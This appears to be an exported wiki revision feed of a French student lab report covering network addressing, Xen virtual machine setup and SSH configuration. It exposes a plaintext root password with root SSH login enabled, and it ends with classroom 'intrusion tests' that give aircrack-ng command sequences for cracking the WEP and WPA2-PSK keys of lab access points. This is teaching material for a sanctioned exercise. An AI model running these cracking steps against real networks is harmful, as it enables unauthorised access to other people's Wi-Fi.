| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56660</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56660"/>
				<updated>2021-11-29T16:43:16Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
